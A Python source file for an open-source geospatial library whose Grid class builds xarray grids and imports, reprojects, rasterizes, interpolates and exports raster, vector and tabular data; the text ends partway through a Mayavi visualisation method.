# <NAME> 2020
# <EMAIL> <EMAIL>
# version = '0.3.9.2'
# https://doi.org/10.5281/zenodo.2553966
#
# MIT License#
# Copyright (c) 2019 <NAME>#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.#
# Standard library imports
import os
import sys
import re
import json
import glob
# Array packages and scipy
import numpy as np
import xarray as xr
import dask.array as da
import pyproj as proj
import pandas as pd
from scipy import interpolate
from scipy import stats
import scipy.ndimage
import imageio
# Vector packages
import geopandas as gpd
import fiona
# Raster packages
from affine import Affine
import rasterio
import rasterio.crs as rcrs # Fix!
from rasterio import features
from rasterio.warp import Resampling
from rasterio.windows import Window
from rasterio.plot import reshape_as_image
# Matplotlib
from matplotlib import pyplot as plt
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.widgets import Slider
import matplotlib.ticker as ticker
import cartopy as cart
import cartopy.crs as ccrs
###
# Mayavi is imported in methods, when needed.
class Grid(object):
'''
Methods to set up, save and modify a multidimensional grid.
'''
# Swich for print statements
verbose = False
km = 1000
def __init__(self,
km=km,
left=-180,
up=90,
right=180,
down=-90,
extent=None,
res=[1, 1],
center=False,
depths=[0. * km, 8. * km, 16. * km, 40. * km, 350. * km],
is_huge=1e5,
crs=4326,
crs_src=4326,
band_coord='RGB',
use_dask=False,
chunk_n=10,
coord_d_type=np.float32,
*args, **kwargs):
'''
Define projection of grid:
crs : integer
left : x or lon coordinate defineing left extent
up ; y or lat coordinate to define upper extent
right : x or lon coordinate to define right extent
down ; y or lat coordinate to define exrtent down
depths : float, integer or list of depths slices
res : resolution is the unit of crs, e.g. degrees or meters
center : Place coordinates in center of grid cell
is_huge : stops creations of crits larger than this number,
to avoid mistakes when defining grid size
use_dask : set to true to contaon dask arrays instead of numpy array
chunk_n
'''
# res given as [x,y]
self.res = list(res)
if isinstance(depths, (int, float)):
depths = [depths]
self.depths = list(depths)
# Generate exptressions for extent:
if extent is None:
self.extent = [left, right, down, up]
else:
self.extent = extent
left, right, down, up = extent
self.ul = (left, up)
self.ur = (right, up)
self.lr = (right, down)
self.ll = (left, down)
self.left, self.up, self.right, self.down = left, up, right, down
self.x1y1x2y2 = (left, up, right, down)
self.wsen = (left, down, right, up)
# Generate expressions for size:
try:
self.nx = int(abs(right - left) // res[0])
self.ny = int(abs(down - up) // res[1])
self.nn = (self.ny, self.nx)
self.nnn = (self.ny, self.nx, len(self.depths))
except ZeroDivisionError:
print('Cell size (%s, %s) is larger than grid. Choose a smaller cell size or larger grid extent.' %res)
if self.nx > is_huge or self.ny > is_huge:
raise Exception('The array is too large:', self.nn, 'Define a smaller grid or incrase the parameter "is_huge"')
# Dask
self.use_dask = use_dask
self.chunk_n = chunk_n
self.transform = rasterio.transform.from_bounds(
left, up, right, down, self.nx, self.ny)
self.coord_d_type = coord_d_type
# rasterio.transform.from_origin(self.left, self.up, *self.res)
# Make the xarray dataset
self.ds = xr.Dataset()
self.ds.coords['X'] = np.linspace(
left, right, self.nx).astype(self.coord_d_type)
self.ds.coords['Y'] = np.linspace(
down, up, self.ny).astype(self.coord_d_type)
self.nz = len(depths)
self.ds.coords['Z'] = np.array(depths).astype(coord_d_type)
assert (np.all(self.ds.coords['X'][1:] >= self.ds.coords['X'][:-1])), \
'X coords must be strictly increasing.'
assert (np.all(self.ds.coords['Y'][1:] >= self.ds.coords['Y'][:-1])), \
'Y coords must be strictly increasing.'
assert (np.all(self.ds.coords['Z'][1:] >= self.ds.coords['Z'][:-1])), \
'Z coords must be strictly increasing.'
# Define edges
self.ds.coords['X_edge'] = np.linspace(
left - res[0] / 2, right + res[0] / 2,
self.nx + 1).astype(self.coord_d_type)
self.ds.coords['Y_edge'] = np.linspace(
down - res[1] / 2, up + res[1] / 2,
self.ny + 1).astype(self.coord_d_type)
# Edges of depths slices are inter- and extrapolated around depths
depth_e = [_ - 0.5 for _ in range(len(depths) + 1)]
inter_d = interpolate.InterpolatedUnivariateSpline(range(len(depths)),
depths, k=1)
self.ds.coords['Z_edge'] = inter_d(depth_e)
# Bands are named after string, e.g. R, G and B bands
self.ds.coords[band_coord] = list(band_coord)
# Numpy arrays are indexed rows and columns (y,x)
self.shape2 = (self.ny, self.nx)
self.shape3 = (self.ny, self.nx, self.nz)
self.xv, self.yv = np.meshgrid(
self.ds.coords['X'], self.ds.coords['Y'])
self.ds.coords['XV'] = (('Y', 'X'), self.xv.astype(coord_d_type))
self.ds.coords['YV'] = (('Y', 'X'), self.yv.astype(coord_d_type))
# Define projections as proj4 strings. Integer is epsg code
if isinstance(crs, int):
crs = '+init=epsg:' + str(crs)
# Default crs of data to import
if isinstance(crs_src, int):
crs_src = '+init=epsg:' + str(crs_src)
self.crs_src = crs_src
self.crs = crs
self.lon, self.lat = proj.transform(proj.Proj(self.crs),
proj.Proj(init='epsg:4326'),
self.xv, self.yv)
self.ds.coords['lat'] = (('Y', 'X'), self.lat.astype(coord_d_type))
self.ds.coords['lon'] = (('Y', 'X'), self.lon.astype(coord_d_type))
# Using dask for coordinates
if use_dask:
self.ds = self.ds.chunk(
{'X': self.nx // chunk_n, 'Y': self.ny // chunk_n})
if self.verbose:
print('Created model:', self.name)
print('Class corners', x1y1x2y2)
print('Class nx ny', self.nx, self.ny, )
print('Depths:', depths)
# Help functions:
def _check_if_in(self, xx, yy, margin=2):
'''Generate an array of the condition that coordinates
are within the model or not.
xx = list or array of x values
yy = list or array of y values
margin = extra cells added to mitigate extrapolation of
interpolated values along the frame
returns boolean array True for points within the frame.
'''
x_min = self.left - margin * self.res[0]
x_max = self.right + margin * self.res[0]
y_min = self.down - margin * self.res[1]
y_max = self.up + margin * self.res[1]
return (xx > x_min) & (xx < x_max) & (yy > y_min) & (yy < y_max)
def _set_meridian(self, x_array, center_at_0=True):
'''
Sloppy function to change longitude values from [0..360] to [-180..180]
x_array : Numpy array with longitude values (X)
center_at_0 : Bool select direction of conversion.
lon=(((lon + 180) % 360) - 180)
'''
if center_at_0:
x_array[x_array > 180] = x_array[x_array > 180] - 360
else:
x_array[x_array < 0] = x_array[x_array < 0] + 360
return x_array
def _user_to_array(self, im_data):
'''Reads user input to numpy array.
Returns copy of data.
'''
if isinstance(im_data, str):
if im_data is '':
im_data = None
else:
im_data = self.ds[im_data].values
elif im_data is None:
im_data = np.empty(self.nn)
im_data[:] = np.nan
elif isinstance(im_data, list):
im_data = np.array(im_data)
elif isinstance(im_data, (np.ndarray, np.generic)):
pass # if numpy array
else:
im_data = im_data.values # if data frame
return np.copy(im_data)
def _set_v_range(vmin, vmax, im_data,
first_pile=0.1,
last_pile=99.9):
'''
Set color range from percentilles, to be implimented.
'''
if vmin is None:
vmin = np.nanpercentile(im_data, first_pile)
if vmax is None:
vmax = np.nanpercentile(im_data, last_pile)
return vmin, vmax
def _meta_to_dict(self,
f_name='',
meta_dict={},
get_meta_data=True,
meta_file=None):
'''Open JSON ot textfile to dict, for use as attribute data
f_name : string file to import, suffix is not used
meta_dict : Dictionary with meta data
get_meta_data : reads metadata from json file
meta_file: path to JSAOn file, if not included same name as data file
returns: dict
'''
if get_meta_data:
if meta_file is None:
meta_name = os.path.splitext(f_name)[0]
if os.path.isfile(meta_name + '.json'):
with open(meta_name + '.json', 'r') as fp:
meta_dict = {**meta_dict, **json.loads(fp.read())}
elif os.path.isfile(meta_name + '.txt'):
with open(meta_name + '.txt', 'r') as fp:
meta_dict = {**meta_dict, **{meta_name: fp.read()}}
else:
print('Need json or text file.')
return meta_dict
    def _epsg_to_cartopy(self, proj4_in, **kwargs):
        '''Map an EPSG code to a cartopy projection instance.

        proj4_in : EPSG integer, or a proj4 string -- in the string case the
            numeric code is extracted from self.crs (not from proj4_in)
        kwargs : forwarded to the cartopy projection constructors, e.g.
            central_longitude, false_easting, globe. See
            https://scitools.org.uk/cartopy/docs/latest/crs/projections.html
        Returns the matching cartopy.crs projection.
        Rather short lookup list at the moment, but is to be expanded.
        '''
        if isinstance(proj4_in, str):
            # NOTE(review): the regex is applied to self.crs, not to the
            # proj4_in argument itself -- confirm that this is intended.
            proj4_in = int(re.findall("\d+.\d+", self.crs)[0])
        assert (isinstance(proj4_in, int) and len(str(abs(proj4_in))) <= 6), \
            'proj4 string cannot be converted to epsg code'
        # Static lookup of supported codes. To be read from json file.
        map_proj_dict = {3031: ccrs.Stereographic(central_latitude=-90,
                                                  true_scale_latitude=-71,
                                                  **kwargs),
                         3030: ccrs.Stereographic(central_latitude=-90,
                                                  true_scale_latitude=71,
                                                  **kwargs),
                         4326: ccrs.PlateCarree(**kwargs),
                         900913: ccrs.GOOGLE_MERCATOR,
                         27700: ccrs.OSGB(**kwargs),
                         3413: ccrs.Stereographic(
            central_longitude=-45,
            central_latitude=90,
            true_scale_latitude=70)
        }
        # Cartopy can also read other epsg codes, but only with internet connection
        # The EPSG code must correspond to a "projected coordinate system",
        # EPSG codes such as 4326 (WGS-84) which define a "geodetic coordinate system" will not work.
        # NOTE(review): ccrs.epsg(3577) is attempted on every call; when it
        # fails (e.g. offline) the whole lookup raises, even for codes that
        # are in the static dict above -- confirm that this is intended.
        try:
            map_proj_dict = {**map_proj_dict, **{3577 : ccrs.epsg(3577)}}
        except:
            raise Exception('Cartopy can not read EPSG code: %s' % proj4_in)
        return map_proj_dict[proj4_in]
def data_to_grid(self, data,
dims_order=['Y', 'X', 'Z', 't'],
**kwargs):
'''Convenience function
data : numpy array in the right size
dims_order: list of order to fit dims of array with grid model
kwargs sent to _meta_to_dict:
meta_dict dict with meta data
'''
dims = dims_order[:data.ndim]
# Look for meta data and write to attrs
meta_data = self._meta_to_dict(**kwargs)
return xr.DataArray(data, dims=dims, attrs=meta_data)
def save(self, data=None, file_name='grid.nc'):
'''
Saves dataset to netCDF.
file_name string
returns size of file.
'''
if data is None:
data = self.ds
data.to_netcdf(file_name)
return os.path.getsize(file_name)
def save_info(self, ds=None, file_name='info.txt', write_coords=False,
**kwargs):
'''Save json file with instance parameters
Keyword arguments:
write_coords -- writes complete list of coordinates '''
if ds is None:
ds = self.ds
if file_name is None:
file_name = 'info.txt'
info = self.__dict__.copy()
info['ds'] = 'xarray dataset'
info['coord_d_type'] = str(info['coord_d_type'])
for array in ['xv', 'yv', 'lon', 'lat']:
if write_coords:
info[array] = info[array].tolist()
else:
info[array] = info[array][
[0, 0, -1, -1], [0, -1, 0, -1]].tolist()
with open(file_name, 'w') as outfile:
json.dump(info, outfile, indent=4, ensure_ascii=False, **kwargs)
return info
    def land_mask(self,
                  polygon_frame=None,
                  polygon_res=None,
                  all_touched=True,
                  oceans=True):
        '''Create a 2D array with only land

        NOTE(review): stub -- the vector download and rasterization are not
        implemented yet, so mask stays the scalar 1 (or its bitwise inverse).
        polygon_frame : vector source to rasterize (currently unused)
        polygon_res : resolution option for the downloaded vector (unused)
        all_touched : rasterization option (unused)
        oceans : if True, invert the mask
        '''
        if polygon_frame is None:
            pass
            # Download global vector file in with the resolution option of
            # polygon_res=None)
        mask = 1  # placeholder; rasterize map for section once implemented
        if oceans:
            # NOTE(review): np.invert is bitwise NOT, so invert(1) == -2;
            # presumably a boolean negation was intended -- confirm.
            mask = np.invert(mask)
        return mask
def change_coord(self,
array,
old,
new,
fill_value=np.nan,
interpol='linear',
axis=None,
bounds_error=False,
**kwargs):
'''Interpolate dimension into new defined depth from coord or list.
Keyword arguments:
array -- np.array, list or dataset to be interpolated at new points
if array is a string, it will be converted to data frame in self
old -- coord to interpolate
new -- coord to interpolate to
interpol -- interpolation method, e.g. nearest, linear or cubic
fill_value -- extrapolation value
'''
array = self._user_to_array(array)
old = self._user_to_array(old)
new = self._user_to_array(new)
# If none, use last dim!
if axis is None:
axis = 2
if array.ndim == 1:
axis = 0
return interpolate.interp1d(old,
array,
axis=axis,
bounds_error=bounds_error,
kind=interpol,
fill_value=fill_value,
**kwargs)(new)
def fold_to_low_res(self, large, small):
'''
Takes high resolution 2D array (large) and places subarrays in
additional dimensions.
The output array have the same resolution as the second array (small)
and can be computed together.
nx and nn of large must be a multiple of nx, and ny of small.
Keyword arguments:
large -- is high res array
small -- low res array
Returns folded high res with shape[:2] same as small.
'''
res = (np.shape(large)[0] // np.shape(small)[0],
np.shape(large)[1] // np.shape(small)[1])
return large.values.reshape(np.shape(small.values)[0], res[0],
np.shape(small.values)[1], res[1]).transpose(0, 2, 1, 3)
def flatten_to_high_res(self, folded, large):
'''Flatten a processed array back to high dimension. Reverse of fold_to_low_res.
Returns a high resolution array.
'''
return folded.transpose(0, 2, 1, 3).reshape(np.shape(large.values)[0],
np.shape(large.values)[1])
# Import data
    def assign_shape(self,
                     f_name,
                     attribute=None,
                     z_dim=False,
                     z_max='z_max',
                     z_min='z_min',
                     all_touched=True,
                     burn_val=None,
                     map_to_int=True,
                     sort_alphabetically=False,
                     print_map=False,
                     save_map_to_text=None,
                     return_map=False,
                     fill_value=np.nan,
                     **kwargs):
        '''Rasterize vector polygons onto the grid.

        f_name : vector file readable by geopandas; reprojected to self.crs
        attribute : attribute whose values are burned into the raster
        z_dim : make a 3D raster, burning each polygon only into the depth
            slices between its z_min and z_max attributes
        z_min, z_max : labels of the attributes holding min and max depths
        all_touched : burn a cell when touched, not only when its centre is
            covered
        burn_val : constant that replaces the attribute values when given
        map_to_int : map (e.g. string) attribute values to integer classes
            1..n; with False, non-numeric attributes will fail to rasterize
        sort_alphabetically : sort the classes case-insensitively before
            numbering them
        print_map : print the value -> integer mapping
        save_map_to_text : path to save the mapping as csv, e.g.
            attr_to_value.csv
        return_map : also return the value -> integer dict
        fill_value : raster value for cells not covered by any polygon
        Returns a numpy array (and the mapping dict when return_map is set
        together with map_to_int).
        Thanks:
        https://gis.stackexchange.com/questions/216745/get-polygon-shapefile-in-python-shapely-by-clipping-linearring-with-linestring/216762
        '''
        shape = gpd.read_file(f_name).to_crs(self.crs)
        if burn_val is not None:
            # Override the attribute with a constant burn value.
            shape[attribute] = [burn_val] * len(shape)
        # Convert attribute values (e.g. strings) to integer classes 1..n.
        if map_to_int:
            if sort_alphabetically:
                x = sorted(list(set(shape[attribute])), key=str.lower)
            else:
                x = list(set(shape[attribute]))
            moby_dict = dict(zip(x, list(range(1, len(x) + 1))))
            if print_map:
                print(moby_dict)
            if save_map_to_text is not None:
                pd.DataFrame(list(moby_dict.items())).to_csv(save_map_to_text)
            shape[attribute] = [moby_dict[v] for v in shape[attribute]]
        # With z_dim, a 3D grid is formed where attributes are written to
        # layers between z_min and z_max.
        if z_dim:
            data = np.empty(self.shape3)
            # NOTE(review): this initial z_select is overwritten on the first
            # loop pass and appears to be dead code.
            z_select = np.empty([len(shape)]).astype('bool')
            for i, zi in enumerate(self.depths):
                # NOTE(review): the comprehension variables shadow the z_min
                # and z_max label parameters; the zip() iterables are
                # evaluated first with the labels, so this works but is
                # fragile -- confirm before touching.
                z_select = [z_min <= zi and z_max >= zi for
                            z_min, z_max in zip(shape[z_min], shape[z_max])]
                shape_select = shape[z_select]
                to_burn = ((geom, value) for geom, value in zip(
                    shape_select.geometry, shape_select[attribute]))
                data[:, :, i] = features.rasterize(
                    shapes=to_burn,
                    out_shape=self.shape2,
                    transform=self.transform,
                    fill=fill_value,
                    all_touched=all_touched,
                    **kwargs)
        else:
            # 2D case: burn all polygons into a single layer.
            data = np.empty(self.nn)
            to_burn = ((geom, value)
                       for geom, value in zip(shape.geometry, shape[attribute]))
            data = features.rasterize(
                shapes=to_burn,
                out_shape=self.shape2,
                transform=self.transform,
                fill=fill_value,
                all_touched=all_touched,
                **kwargs)
        if (map_to_int and return_map):
            return data, moby_dict
        else:
            return data
def read_grid(self,
f_name,
xyz=('x', 'y', 'z'),
interpol='linear',
crs_src=None,
crs=None,
use_dask=None,
dask_chunks=None,
read_dask_dict=None,
bulk=False,
extension='.nc',
ep_max=10,
pad_around=False,
sort=True,
only_frame=True,
deep_copy=False,
set_center=False,
regex_index=None,
def_depths=None,
verbose=False,
return_list=False,
names_to_numbers=True,
depth_factor=1,
name_i=-1,
**kwargs):
'''Read irregular (or regular) grid. Resampling and interpolating.
Keyword arguments:
f_name : string path to dir or file. Ii list, it is read as list of paths to files.
xyz --- Sequence with x, y and data labels
interpol --- Interpolation method, e.g cubic, nearest
only_frame --- Speeds up interpolation by only
regard points within the grid extent (+ margins)
Returns numpy array'''
if crs_src is None:
crs_src = self.crs_src
if crs is None:
crs = self.crs
if use_dask is None:
use_dask = self.use_dask
if bulk:
if isinstance(f_name, str):
assert os.path.isdir(
f_name), 'Please provide path to directory containing files.'
f_names = glob.glob(f_name + '*' + extension)
elif isinstance(f_names, list):
for f_name in f_names:
assert os.path.isfile(f_name), '%s Is not a file.' % f_name
else:
f_names = []
if sort:
f_names.sort(key=str.lower)
else:
if isinstance(f_name, str):
assert os.path.isfile(
f_name), 'Please provide path to a file, not directory. Or set bulk=True'
f_names = [f_name]
if names_to_numbers:
try:
f_names_float = [re.findall(r"[-+]?\d*\.\d+|\d+", _)
for _ in f_names]
f_names_float = [float(_[name_i]) *
depth_factor for _ in f_names_float]
except:
names_to_numbers = False
f_names_float = None
i_grid = np.empty(self.nn + (len(f_names),))
for i, f in enumerate(f_names):
if verbose:
print('%s/%s' % (i + 1, len(f_names)), f)
if isinstance(f_name, str):
array = xr.open_dataset(f, chunks=read_dask_dict).copy(
deep=deep_copy)
else:
array = f_name.copy(deep=deep_copy)
x = array[xyz[0]].values
y = array[xyz[1]].values
# Set longitude, case from 0 to -360 insetad of -180 to 180
if set_center:
x = self._set_meridian(x)
xx, yy = np.meshgrid(x, y) # x, y
xv, yv = proj.transform(proj.Proj(crs_src),
proj.Proj(crs), xx, yy)
zv = array[xyz[2]].values
n = zv.size
zi = np.reshape(zv, (n))
xi = np.reshape(xv, (n))
yi = np.reshape(yv, (n))
# Check and interpolate only elements in the frame
if only_frame:
is_in = self._check_if_in(xi, yi)
xi = xi[is_in]
yi = yi[is_in]
zi = zi[is_in]
arr = interpolate.griddata((xi, yi),
zi,
(self.ds.coords['XV'],
self.ds.coords['YV']),
method=interpol,
**kwargs)
if pad_around:
for i in range(ep_max)[::-1]:
arr[:, i][np.isnan(arr[:, i])] = arr[
:, i + 1][np.isnan(arr[:, i])]
arr[:, -i][np.isnan(arr[:, -i])] = arr[:, -
i - 1][np.isnan(arr[:, -i])]
arr[i, :][np.isnan(arr[i, :])] = arr[
i + 1, :][np.isnan(arr[i, :])]
arr[-i, :][np.isnan(arr[-i, :])] = arr[-i -
1, :][np.isnan(arr[-i, :])]
i_grid[..., i] = arr
if len(f_names) is 1:
i_grid = np.squeeze(i_grid, axis=2)
if dask_chunks is None:
if use_dask:
i_grid = da.from_array(i_grid, chunks=dask_chunks)
dask_chunks = (self.nx // self.chunk_n,) * i_grid.ndim
if return_list:
if names_to_numbers:
f_names = f_names_float
return i_grid, f_names
else:
return i_grid
def read_numpy(self,
x = 0,
y = 1,
z = 2,
data = None,
interpol='linear',
crs_src=None,
crs=None,
use_dask=None,
dask_chunks=None,
pad_around=False,
only_frame=True,
set_center=False,
verbose=False,
z_factor=1,
**kwargs):
'''Read numpy array and interpolate to grid.
Keyword arguments:
x,y,z numpy arrays of same size, eg, A[0,:], A[1,:], A[2,:]
Returns numpy array
kwargs to interpolation
'''
if data is not None:
x = data[:,x]
y = data[:,y]
z = data[:,z]
assert(np.shape(x)==np.shape(y)==np.shape(z)), 'x, y, and z must have the same shape.'
if crs_src is None:
crs_src = self.crs_src
if crs is None:
crs = self.crs
if verbose:
print('Shape:', np.shape(x))
if z_factor is not 1:
z *= z_factor
# Set longitude, case from 0 to -360 insetad of -180 to 180
if set_center:
x = self._set_meridian(x)
xv, yv = proj.transform(proj.Proj(crs_src),
proj.Proj(crs), x, y)
n = z.size
zi = np.reshape(z, (n))
xi = np.reshape(xv, (n))
yi = np.reshape(yv, (n))
# Check and interpolate only elements in the frame
if only_frame:
is_in = self._check_if_in(xi, yi)
xi = xi[is_in]
yi = yi[is_in]
zi = zi[is_in]
arr = interpolate.griddata((xi, yi),
zi,
(self.ds.coords['XV'],
self.ds.coords['YV']),
method=interpol,
**kwargs)
if pad_around:
for i in range(ep_max)[::-1]:
arr[:, i][np.isnan(arr[:, i])] = arr[
:, i + 1][np.isnan(arr[:, i])]
arr[:, -i][np.isnan(arr[:, -i])] = arr[:, -
i - 1][np.isnan(arr[:, -i])]
arr[i, :][np.isnan(arr[i, :])] = arr[
i + 1, :][np.isnan(arr[i, :])]
arr[-i, :][np.isnan(arr[-i, :])] = arr[-i -
1, :][np.isnan(arr[-i, :])]
if use_dask:
if dask_chunks is None:
dask_chunks = (self.nx // self.chunk_n,) * arr.ndim
arr = da.from_array(arr, chunks=dask_chunks)
return arr
def read_ascii(self,
f_name,
x_col=0,
y_col=1,
data_col=2,
interpol='linear',
autostrip = True,
no_data=None,
only_frame=True,
crs_src=None,
encoding = None,
set_center=False,
crs=None,
z_factor=1,
coord_factor=1,
skiprows=0,
**kwargs):
'''Read ascii table to grid
Textfile, e.g. csv, to grid.
Keyword arguments:
f_name -- String, name of file to import
x_col -- index for column holding x values in given crs
y_col --index for column holding y values in given crs
data_col -- index for column with data values
'''
if crs is None:
crs = self.crs
if crs_src is None:
crs_src = self.crs_src
if encoding is None:
encoding = 'bytes'
#table = np.loadtxt(f_name, skiprows=skiprows, **kwargs) # Add kwargs
table = np.genfromtxt(f_name,
skip_header=skiprows,
autostrip=autostrip,
encoding=encoding, **kwargs)
if self.verbose:
print(table[:5, :])
if coord_factor is not 1:
table[:, x_col] *= coord_factor
table[:, y_col] *= coord_factor
if z_factor is not 1:
table[:, data_col] *= z_factor
# Set longitude, case from 0 to -360 insetad of -180 to 180
if set_center:
table[:, x_col] = self._set_meridian(table[:, x_col])
xx, yy = proj.transform(proj.Proj(crs_src),
proj.Proj(crs), table[:, x_col], table[:, y_col])
if only_frame:
is_in = self._check_if_in(xx, yy)
xx = xx[is_in]
yy = yy[is_in]
zz = table[:, data_col][is_in]
else:
zz = table[:, data_col]
return interpolate.griddata((xx, yy),
zz,
(self.ds.coords['XV'],
self.ds.coords['YV']),
method=interpol,
**kwargs)
def read_raster(self,
f_name,
src_crs=None,
source_extra=500,
resampling=None,
sub_sampling=None,
sub_window=None,
num_threads=4,
no_data=None,
rgb_convert=True,
bit_norm=255,
**kwargs):
'''Imports raster in geotiff format to grid.
Using gdal/rasterio warp to transform raster to right crs and extent.
sub_sampling -- integer to decrease size of input raster and speed up warp
Resampling -- Interpolation method
Options for resampling:
Resampling.nearest,
Resampling.bilinear,
Resampling.cubic,
Resampling.cubic_spline,
Resampling.lanczos,
Resampling.average
A window is a view onto a rectangular subset of a raster
dataset and is described in rasterio by column and row offsets
and width and height in pixels. These may be ints or floats.
Window(col_off, row_off, width, height)
Returns numpy array.
'''
in_raster = rasterio.open(f_name)
if src_crs is None:
src_crs = in_raster.crs
if self.verbose:
print(src_crs)
if resampling is None:
resampling = Resampling.nearest
if self.verbose:
print('Raster bounds:', in_raster.bounds, in_raster.shape)
dst_crs = self.crs
if sub_sampling in (None, 0, 1):
sub_sampling = 1
raster_shape = (in_raster.count, in_raster.height //
sub_sampling, in_raster.width // sub_sampling)
# window=Window.from_slices(sub_window)
source = in_raster.read(out_shape=raster_shape)
if sub_window is None:
pass
else:
print('Window not implimented yet.')
src_transform = rasterio.transform.from_bounds(*in_raster.bounds, raster_shape[2], raster_shape[1])
dst_array = np.zeros((in_raster.count, *self.shape2))
rasterio.warp.reproject(
source,
dst_array,
src_transform=src_transform,
src_crs=src_crs,
dst_transform=self.transform,
dst_crs=dst_crs,
resampling=resampling,
source_extra=source_extra,
num_threads=num_threads,
**kwargs)
if (rgb_convert and in_raster.count > 2):
dst_array = reshape_as_image(dst_array / bit_norm).astype(float)
if in_raster.count == 1:
dst_array = dst_array[0, :, :]
if no_data is not None:
dst_array[dst_array == no_data] = np.nan
return dst_array
# Exports
def grid_to_grd(self, data, save_name='grid.nc'):
'''Save data array as netCDF
Keyword arguments:
data --- string or data array
'''
if isinstance(data, str):
data = self.ds[data]
save_grid = data.to_netcdf(save_name)
return save_grid
def grid_to_raster(self, data,
save_name='raster_export.tif',
raster_dtype=np.float64,
raster_factor=1):
'''Save as geoTIFF
data : array or label
svae_name : string save as tif name
raster_dtype : dtype to save to, e.g. bit depth
raster_factor : factor to multiply value
'''
data = (self._user_to_array(data) * raster_factor).astype(raster_dtype)
# If 2D array, define 3rd dimention as 1
if data.ndim == 2:
data.shape += 1,
n_bands = data.shape[2]
with rasterio.open(save_name, 'w', driver='GTiff',
height=data.shape[0], width=data.shape[1],
count=n_bands, dtype=raster_dtype,
crs=self.crs,
transform=self.transform) as dst:
for k in range(n_bands):
dst.write(data[:, :, k], indexes=k + 1)
return None
def grid_to_ascii(self,
data,
asc_file_name='corners.txt',
center=True,
fmt='%6.2f',
no_data=-9999):
'''Save to asc format
Keyword arguments:
corner -- Coordinates of corner, else centre
https://gis.stackexchange.com/questions/37238/writing-numpy-array-to-raster-file?rq=1
http://resources.esri.com/help/9.3/ArcGISengine/java/Gp_ToolRef/Spatial_Analyst_Tools/esri_ascii_raster_format.htm
'''
data = self._user_to_array(data)
header_labels = ['NCOLS', 'NROWS', 'XLLCORNER',
'YLLCORNER', 'CELLSIZE', 'NODATA_VALUE']
header_values = [self.nx, self.ny, self.left,
self.down, self.res[0], no_data]
if center:
header_labels[2:4] = ['XLLCENTER', 'YLLCENTER']
header_values[2:4] = header_values[2:3] + \
[self.res[0] / 2, self.res[1] / 2]
# The wunder of Python:
header = ''.join([''.join(h) for h in zip(
header_labels, [' '] * 6, [str(val) for val in header_values], ['\n'] * 6)])
np.savetxt(asc_file_name, data,
delimiter=' ',
header=header,
newline='',
comments='',
fmt=fmt)
return os.path.getsize(asc_file_name)
def bins_to_grid(self,
values,
samples=None,
xi=None,
yi=None,
zi=None,
sample_src=None,
function='mean',
return_only_statistic=True,
):
'''Reads lists of data values, and coordinates and generate
bins and apply function to each bin. E.g. to generate geographical histagrams.
values : list or array of data values
samples : array with coordnates. Must be the shape D arrays of length N, or as an (N,D)
xi : if samples is none, coordinates rae read xi, yi, zi
yi :
zi : If no zi is given, 2D bins are generated
sample_src : If not None, data points are reprojected from this CSR.
function to apply to bins. A string eg: ‘median’, 'std', 'median',
or a defined function that takes a 1D array an returnsrn a scalar.
return_only_statistic : boolean. If False, method returns statistics, edges, binnumbers
'''
def _build_samples(di, values):
di = np.array(di)
assert (np.shape(values) == np.shape(di)
), 'Samples and values must have same shape.'
return di
values = np.array(values)
if samples is not None:
samples_dim = samples.ndim + 1
else:
if zi is None:
samples_dim = 2
else:
samples_dim = 3
assert (samples_dim in [
2, 3]), 'Samples must be 2 or 3D arrays of same lenght'
if samples_dim is 2:
if samples is None:
samples = np.array((
_build_samples(yi, values),
_build_samples(xi, values),))
bins = (self.ds['Y_edge'], self.ds['X_edge'])
elif samples_dim is 3:
if samples is None:
samples = np.array((
_build_samples(yi, values),
_build_samples(xi, values),
_build_samples(zi, values),))
bins = (self.ds['Y_edge'],
self.ds['X_edge'], self.ds['Z_edge'])
if sample_src is not None:
if isinstance(sample_src, int):
sample_src = '+init=epsg:' + str(sample_src)
xi, yi = proj.transform(proj.Proj(sample_src),
proj.Proj(self.crs), samples[0], samples[1])
samples[0] = xi
samples[1] = yi
bin_data = scipy.stats.binned_statistic_dd(samples.T,
values,
statistic=function,
bins=bins,
expand_binnumbers=False)
if return_only_statistic:
return bin_data.statistic
else:
return bin_data
def grid_to_object(self, data, f_name='grid_obj'):
'''
Use Mayavi /VTK to export grid as .obj file for advance visualisation etc.
data : data to export
f_name : string file to save
'''
from mayavi import mlab
data = self._user_to_array(data)
mlab.savefig(f_name)
return None
# Vizualisations
def extract_profile(self):
'''
To be implemented from Staal et al 2019: extract profiles.
'''
pass
return 0
    def oblique_view(self, data,
                     save_name=None,
                     show=False,
                     azimuth=0,
                     elevation=45,
                     distance=1100,
                     roll=90,
                     figsize=(1800, 1800),
                     bgcolor=(1., 1., 1.),
                     warp_scale=0.015,
                     lut=None,
                     vmin=None,
                     vmax=None,
                     cmap='terrain'):
        '''3D oblique view of a 2D surface, rendered with Mayavi/VTK.

        Keyword arguments:
        save_name -- file name to save a screenshot to (None: no file)
        show -- open an interactive window; otherwise render offscreen
        azimuth -- Camera direction
        elevation -- Camera height
        distance -- Camera distance
        roll -- Camera rotation
        figsize -- render size in pixels
        bgcolor -- Tuple of length 3, values from 0 to 1 RGB
        warp_scale -- Enhance z, lower value increase the distortion
        lut -- custom colour lookup table; only applied when cmap is None
        vmin and vmax -- Set color range (0.1/99.9 percentiles by default)
        cmap -- Mayavi colormap name; pass None to use ``lut`` instead

        Function exemplifies the use of mayavi and VTK for visualizing
        multidimensional data.
        '''
        # Import mlab lazily so the module loads without Mayavi installed.
        from mayavi import mlab
        # mlab.clf()
        data = self._user_to_array(data)
        if vmin is None:
